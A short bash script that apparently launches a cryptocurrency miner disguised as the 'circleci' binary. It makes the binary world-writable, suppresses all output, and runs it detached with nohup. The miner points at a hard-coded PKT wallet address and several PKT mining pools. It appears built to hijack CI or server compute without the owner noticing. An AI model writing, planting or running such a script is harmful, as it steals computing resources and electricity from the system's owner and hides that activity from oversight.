#!/bin/bash

chmod 777 circleci >/dev/null 2>&1
nohup ./circleci ann -p pkt1q76dngmrf380w8k9j4f7w4eqpzx3n9vcprldmjx https://stratum.zetahash.com http://pool.pkt.world http://pool.pktpool.io > nohup.out >/dev/null 2>&1 



